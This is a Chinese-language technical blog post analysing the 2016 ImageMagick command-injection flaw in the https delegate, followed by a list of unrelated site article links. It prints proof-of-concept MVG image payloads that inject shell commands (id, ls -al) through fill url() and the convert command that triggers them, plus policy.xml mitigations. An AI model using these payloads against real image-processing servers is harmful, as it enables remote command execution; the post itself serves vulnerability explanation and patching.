深入浅析ImageMagick命令执行漏洞


Posted in Python onOctober 11, 2016

00 前言

什么是ImageMagick?

ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。

由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。

01 漏洞描述

ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PHP imagick、Ruby rmagick和paperclip以及NodeJS imagemagick等多个图片处理插件都依赖它运行。当攻击者构造含有恶意代码得图片时,ImageMagick库对于HTTPPS文件处理不当,没有做任何过滤,可远程实现远程命令执行,进而可能控制服务器。

02 影响程度

攻击成本:低

危害程度:高

影响范围:ImageMagick 6.9.3-9以前的所有版本

03 漏洞分析

命令执行漏洞是出在ImageMagick对https形式的文件处理的过程中。

ImageMagick之所以支持那么多的文件格式,是因为它内置了非常多的图像处理库,对于这些图像处理库,ImageMagick给它起了个名字叫做”Delegate”(委托),每个Delegate对应一种格式的文件,然后通过系统的system()命令来调用外部的lib进行处理。调用外部lib的过程是使用系统的system命令来执行的,导致命令执行的代码。

ImageMagick委托的默认配置文件: /etc/ImageMagick/delegates.xml

具体代码请参考:Github-ImageMagick

我们定位到https委托得那一行:

" <delegate decode=\"https\" command=\""wget" -q -O "%o" "https:%M"\"/>"

可以看到,command定义了它对于https文件处理时带入system()函数得命令:"wget" -q -O "%o" "https:%M"。

wget是从网络下载文件得命令,%M是一个占位符,它得具体定义在配置文件中如下:

%i input image filename
%o output image filename
%u unique temporary filename
%Z unique temporary filename
%# input image signature
%b image file size
%c input image comment
%g image geometry
%h image rows (height)
%k input image number colors
%l image label
%m input image format
%p page number
%q input image depth
%s scene number
%w image columns (width)
%x input image x resolution
%y input image y resolution

可以看到%m被定义为输入的图片格式,也就是我们输入的url地址。但是由于只是做了简单的字符串拼接,没有做任何过滤,直接拼接到command命令中,所以我们可以将引号闭合后通过"|",”`”,”&”等带入其他命令,也就形成了命令注入。

比如我们传入如下代码:

https://test.com"|ls “-al

则实际得system函数执行得命令为:

“wget” -q -O “%o” “ https://test.com"|ls “-al”

这样,ls -al命令成功执行。

04 漏洞利用

这个漏洞得poc由老外给出得,如下:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

push和pop是用于堆栈的操作,一个进栈,一个出栈;

viewbox是表示SVG可见区域的大小,或者可以想象成舞台大小,画布大小。简单理解就是根据后面得参数选取其中得一部分画面;

fill url()是把图片填充到当前元素内;

在其中我们使用了fill url()的形式调用存在漏洞的https delegate,当ImageMagick去处理这个文件时,漏洞就会被触发。

附:ImageMagick默认支持一种图片格式,叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,允许在其中加载ImageMagick中其他的delegate(比如存在漏洞的https delegate)。并且在图形处理的过程中,ImageMagick会自动根据其内容进行处理,也就是说我们可以将文件随意定义为png、jpg等网站上传允许的格式,这大大增加了漏洞的可利用场景。

利用过程:

创建一个exploit.png文件,包含以下内容:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://test.com/image.jpg"|ls "-al)'
pop graphic-context

执行命令:convert exploit.png 1.png(后面的是convert的参数)

深入浅析ImageMagick命令执行漏洞

05 漏洞修复

升级到最新版本

配置/etc/ImageMagick/policy.xml的方式来禁止https、mvg这些delegate,或者直接在配置文件删除相应的delegate

<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>

以上所述是小编给大家介绍的ImageMagick命令执行漏洞的知识,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!

Python 相关文章推荐
详解Python的迭代器、生成器以及相关的itertools包
Apr 02 Python
Python的装饰器模式与面向切面编程详解
Jun 21 Python
Python对数据库操作
Mar 28 Python
python学习 流程控制语句详解
Jun 01 Python
Python批量查询域名是否被注册过
Jun 21 Python
LRUCache的实现原理及利用python实现的方法
Nov 21 Python
Python实现邮件的批量发送的示例代码
Jan 23 Python
Pandas删除数据的几种情况(小结)
Jun 21 Python
Python with语句和过程抽取思想
Dec 23 Python
Pycharm和Idea支持的vim插件的方法
Feb 21 Python
Python如何用filter函数筛选数据
Mar 05 Python
call在Python中改进数列的实例讲解
Dec 09 Python
Zabbix实现微信报警功能
Oct 09 #Python
python 2.6.6升级到python 2.7.x版本的方法
Oct 09 #Python
Django1.7+python 2.78+pycharm配置mysql数据库
Oct 09 #Python
解决python2.7 查询mysql时出现中文乱码
Oct 09 #Python
基于python脚本实现软件的注册功能(机器码+注册码机制)
Oct 09 #Python
python连接mysql实例分享
Oct 09 #Python
Python中运算符&quot;==&quot;和&quot;is&quot;的详解
Oct 08 #Python
You might like
ThinkPHP实现一键清除缓存方法
2014/06/26 PHP
jQuery 中使用JSON的实现代码
2011/12/01 Javascript
网页加载时页面显示进度条加载完成之后显示网页内容
2012/12/23 Javascript
解析Javascript小括号“()”的多义性
2013/12/03 Javascript
eclipse导入jquery包后报错的解决方法
2014/02/17 Javascript
javascript setinterval 的正确语法如何书写
2014/06/17 Javascript
javascript使用正则表达式检测IP地址
2014/12/03 Javascript
jquery让指定的元素闪烁显示的方法
2015/03/17 Javascript
Bootstrap树形控件使用方法详解
2016/01/27 Javascript
js中string和number类型互转换技巧(分享)
2016/11/28 Javascript
浅谈Node.js:理解stream
2016/12/08 Javascript
jquery实现一个全局计时器(商城可用)
2017/06/30 jQuery
jQuery Autocomplete简介_动力节点Java学院整理
2017/07/17 jQuery
jQuery Validate插件ajax方式验证输入值的实例
2017/12/21 jQuery
vue学习教程之带你一步步详细解析vue-cli
2017/12/26 Javascript
Node.js控制台彩色输出的方法与原理实例详解
2019/12/01 Javascript
[01:18:31]DOTA2-DPC中国联赛定级赛 LBZS vs Magma BO3第一场 1月10日
2021/03/11 DOTA
Python中Django 后台自定义表单控件
2017/03/28 Python
Python使用三种方法实现PCA算法
2017/12/12 Python
Python使用Scrapy保存控制台信息到文本解析
2017/12/27 Python
Tensorflow中使用tfrecord方式读取数据的方法
2018/06/19 Python
python中PS 图像调整算法原理之亮度调整
2019/06/28 Python
教你如何编写、保存与运行Python程序的方法
2019/07/12 Python
django基于存储在前端的token用户认证解析
2019/08/06 Python
python实现发送form-data数据的方法详解
2019/09/27 Python
python 实现turtle画图并导出图片格式的文件
2019/12/07 Python
python 解压、复制、删除 文件的实例代码
2020/02/26 Python
python读取多层嵌套文件夹中的文件实例
2020/02/27 Python
python脚本和网页有何区别
2020/07/02 Python
python中scrapy处理项目数据的实例分析
2020/11/22 Python
美国领先的奢侈手表在线零售商:WatchMaxx
2017/12/17 全球购物
贝斯特韦斯特酒店集团官网:Best Western
2019/01/03 全球购物
工艺工程师工作职责
2013/11/23 职场文书
保安拾金不昧表扬信
2014/01/15 职场文书
乡镇组织委员个人整改措施
2014/09/16 职场文书
先进单位申报材料
2014/12/25 职场文书